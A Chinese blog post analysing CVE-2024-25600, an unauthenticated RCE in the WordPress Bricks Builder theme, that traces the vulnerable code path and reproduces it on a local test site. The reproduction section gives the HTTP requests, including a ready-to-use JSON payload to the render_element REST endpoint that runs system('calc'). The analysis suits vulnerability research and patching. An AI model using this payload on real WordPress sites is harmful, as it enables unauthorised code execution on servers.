CVE-2024-25600 WordPress Bricks Builder RCE-漏洞分析研究

已于 2024-03-11 18:48:02 修改
阅读量2.4k 收藏 19
点赞数 11
分类专栏: PHP代码审计 文章标签: 安全 web安全 php
于 2024-03-06 14:02:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shelter1234567/article/details/136503993
版权

本次代码审计项目为PHP语言,我将继续以漏洞挖掘者的视角来分析漏洞的产生,调用与利用.....

前方高能,小伙伴们要真正仔细看咯.....

漏洞简介

CVE-2024-25600 是一个严重的(CVSS 评分 9.8)远程代码执行 (RCE) 漏洞,影响 WordPress 的 Bricks Builder 插件。成功利用此漏洞可能允许未经身份验证的攻击者在受影响的基于 WordPress 的网站上远程执行任意 PHP 代码。据报道,该漏洞已被广泛利用,包括尝试在易受攻击的服务器上安装基于 PHP 的恶意 Webshell。Bricks Builder 插件版本 1.9.6.1 或更高版本中已发布解决此漏洞的补丁。

Bricks Builder官方 Bricks – Visual Site Builder for WordPress

Bricks Builder官方参考文档Getting Started – Bricks Academy

漏洞官方公告Bricks 1.9.6.1 Changelog – Bricks

漏洞分析

先看触发漏洞的代码函数

位于\wp-content\themes\bricks\includes\query.php中346行

这段代码被涉及用来执行用户提交的 PHP 代码并返回执行结果

既然这样,就很大概率能够触发rce

向上分析参数是如何传递的,先分析参数$php_query_raw

$php_query_raw由bricks_render_dynamic_data( $query_vars['queryEditor'], $post_id );得到

可以追入bricks_render_dynamic_data 查看是否对数据进行了过滤处理

追入render_content方法

代码功底好的小伙伴 可以逐行分析下....

回到query.php 337行分析 $query_vars['queryEditor']参数的传递

$query_vars由传入的形参得来。右键find usages 找到调用这个方法(prepare_query_vars_from_settings)被调用的地方

优先考虑__construct方法,该方法会在实例化类时自动执行

在调用方法的代码行111行,向上分析

要想成功调用prepare_query_vars_from_settings方法成功需要

1.在element参数下setting参数下的query参数下,要有参数objectType

2.进入else语句块,$element['id']为空即可 (即不考虑这个参数)

3.在element参数下setting参数下的query参数下,设置参数queryEditor为我们rce代码

4.在element参数下setting参数下的query参数下,要有参数useQueryEditor

那么接下来继续向上分析方法调用(__construct方法的被调用)

逐个进行分析,要分析函数传递的参数是否为我们可控.....

我查看了render_data与render_elemet这两个方法似乎都不太行,但是在分析render_elemet这个方法得到看意外的收获。

....

来到ajax.php中该类在297行,有实例化l类 Query

向上分析参数的调用,重点参数$loop_elemet

在273行与289行之间 似乎时设置了ajax与rest api这两种请求方式。非ajax请求

element参数下没有参数loopElement,$loop_elemet将被置为false

296行的if语句也将为假,这里 new Query是执行不了的。那继续向下看吧,看看有什么线索

$element_class_name将是Element_Container类

在322行我们可以实例化对象, 不过只能对特定的类进行实例化

类似于白名单,我们只能对如下的类进行实例化

假如我们在参数element下设置了name=container,则会实例化Container类,(之前在查找__construct方法时有Container类这个结果,所有要对这个类非常的敏感)

先不急找调用者,分析element成员是否我们可控的

在ajax.php中render_element函数中,$element变量是我们可控的,在322行代码将这个变量赋予了实例化container类

分析下的它的构造函数

,跟入类Container的__construct 魔术方法(在继承的父类)

分析它对传入的$element做了什么处理。上图赋予了此类的的element变量,这也是我们想要看到的。

接下来就可以分析container类render方法的调用了

我们发现base类init方法调用了render方法(继承关系container可以调用此方法)

继续分析render_element函数对container对象又执行了那些操作,

container对象调用了init方法 这就使得我的RCE代码执行成功!

漏洞复现

先获取下nonce值

GET /WordPress-6.4.3/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br

发送payload

POST /WordPress-6.4.3/wp-json/bricks/v1/render_element HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 270
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
​
{
  "postId": "1",
  "nonce": "b5b275220f",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "",
      "query": {
        "useQueryEditor": "",
        "queryEditor": "system('calc');",
        "objectType": ""
      }
    }
  }
}

后续修复

增加用户权限认证

昵称还在想呢
关注
  • 11
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
【译】WordPress Bricks主题安全漏洞曝光,25,000个安装受影响
IT技术分享社区
03-05 645
(概念验证)利用程序,但Snicco和Patchstack都发布了技术细节,指出存在于prepare_query_vars_from_settings()函数中的潜在易受攻击的代码。该漏洞已在2024年2月13日发布的1.9.6.1版本中得到解决,这仅仅是在WordPress安全提供商Snicco在2月10日报告了该漏洞几天后。WordPressBricks主题存在一个严重的安全漏洞,恶意威胁行为者正在积极利用该漏洞在易受攻击的安装上运行任意PHP代码。建议插件的用户应用最新补丁以减轻潜在威胁。
Bricks WordPress 网站生成器中存在 RCE 漏洞,黑客正在积极利用
FreeBuf_的博客
02-20 908
随后,Patchstack 进一步指出,CVE-2024-25600 安全漏洞源于通过 prepare_query_vars_from_settings 中的 eval 函数执行用户控制的输入,$php_query_raw 是从 queryEditor 构建的。据悉,漏洞 CVE-2024-25600 是由 "prepare_query_vars_from_settings "函数中的一个 eval 函数错误调用导致的,未经身份验证的威胁攻击者可利用该函数执行任意 PHP 代码。
探索与利用CVE-2024-25600的利器:Exploit Tool ️
gitblog_00050的博客
06-18 240
探索与利用CVE-2024-25600的利器:Exploit Tool ????️???? 项目地址:https://gitcode.com/Chocapikk/CVE-2024-25600 在这个数字时代,网络安全至关重要。当我们谈论WordPress安全性时, CVE-2024-25600是一个不容忽视的名字。这个漏洞影响了Bricks Builder插件,允许未经授权的远程代码执行(RCE)攻击。为了...
漏洞复现-wordpress RCE-CVE-2024-25600
qq_73648490的博客
02-26 1294
wordpress 远程代码执行!!1
[漏洞分析]WordPress未经身份验证的远程代码执行CVE-2024-25600
网络安全知识分享
03-14 1572
Bricks
一文搭建复现并分析CVE-2024-25600 WordPress Bricks Builder RCE最新漏洞
tlp_zzm的博客
04-01 1545
一文搭建复现并分析CVE-2024-25600 WordPress Bricks Builder RCE最新漏洞
漏洞复现-wordpress RCE-CVE-2024-25600(1),网络安全面试项目经验
m0_60666921的博客
04-07 1062
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**④等保简介、等保规定、流程和规范。
漏洞复现-wordpress RCE-CVE-2024-25600,个人开发者做一款App需要知道的事情
m0_60666921的博客
04-07 479
Bricks Builder是一款用于WordPress的开发主题,提供直观的拖放界面,用于设计和构建WordPress网站。大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。前几天wordpress出现0day漏洞,因发烧恰好错过,今天好的七七八八了,来复现一下。
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
openssh9.8p1安装升级rpm包,修复CVE-2024-6387漏洞
最新发布
07-13
安装版本:OpenSSH_9.8p1, OpenSSL 1.1.1w 11 Sep 2023 升级步骤 1、上传文件到opt目录; 2、yum remove openssh 3、yum localinstall openssh-* 4,检查版本 ssh -V 注意,由于需要卸载oepnssh,需要保持连接状态...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
漏洞分析 | WordPress Bricks Builder远程代码执行漏洞(CVE-2024-25600)
WangsuSecurity的博客
03-15 1063
WordPress小于1.9.6版本的默认配置中存在远程代码执行漏洞,利用条件简单,影响范围甚广
WordPress爆炸性0day,直接RCE!附POC
m0_52514790的博客
02-24 1131
2.漏洞路径为:/wp-json/bricks/v1/render_element,然后使用构造好的POC进行nonce的替换,直接进行命令执行,获取服务器敏感信息以及进行敏感操作。其中执行的命令可以根据自己的需要进行更改即可。1.首先访问存在WordPress Bricks Builder 插件的网站,然后右键查看网页源代码或者使用抓包工具抓取返回的数据包,直接搜索参数nonce,获取其参数值。
wordpress 4.6 RCE漏洞利用(CVE-2016-10033)
xiaobai_20190815的博客
04-08 5333
一、漏洞描述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行 二、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 三、漏洞搭建 vulhub下载,傻瓜式安装,然后漏洞在密码重置这个页面 四、漏洞利用 1、抓包,构造POST /wp-login.p
WordPress BuddyPress 存在越权漏洞RCECVE-2021-21389)
xiaobai_20190815的博客
05-11 3468
一、漏洞描述 BuddyPress 是一个用于构建社区站点的开源 WordPress 插件。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中,非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。该漏洞已在 BuddyPress 7.2.1 中修复。插件的现有安装应更新到此版本以缓解问题 二、影响版本 5.0.0 <BuddyPress< 7.2.1 三、漏洞环境 1、dockerhub拉镜像,docker pull hoangkien10
备份插件存在严重RCE漏洞,可导致WordPress网站遭接管
smellycat000的专栏
12-13 183
聚焦源代码安全,网罗国内外最新资讯!作者:Elizabeth Montalbano编译:代码卫士WordPress 备份插件 Backup Migration 的下载次数已超过9万次,其中存在一个严重的RCE漏洞,可导致易受攻击的 WordPress 网站遭接管。这是又一起因建站平台插件漏洞造成的风险事件。Nex Team 在 Backup Migration 插件中发现了一个 PHP 代码注入...
cve-2024-0195
01-19
cve-2024-0195是一个已被公开的漏洞编号,通常用于标识特定的计算机安全漏洞。这个漏洞编号通常由安全研究人员或组织在发现并报告一个新漏洞时,给漏洞分配一个唯一的标识符。 在这种情况下,cve-2024-0195表示在2024年发现的第195个已知漏洞漏洞编号的目的是帮助用户和组织识别并补救安全漏洞,以保护其系统和数据免受潜在的攻击和损害。 对于普通用户来说,了解漏洞编号有助于他们更好地了解他们的系统或软件是否受到当前已知的漏洞威胁。对于技术人员和安全专家来说,漏洞编号可以帮助他们更有效地管理和防范潜在的安全风险。 总之,cve-2024-0195代表着一个已知的计算机安全漏洞,可能需要通过软件更新、修复补丁或其他安全措施来加以解决。因此,对于系统管理员和用户来说,了解并及时处理漏洞编号所代表的漏洞是非常重要的。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

昵称还在想呢

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值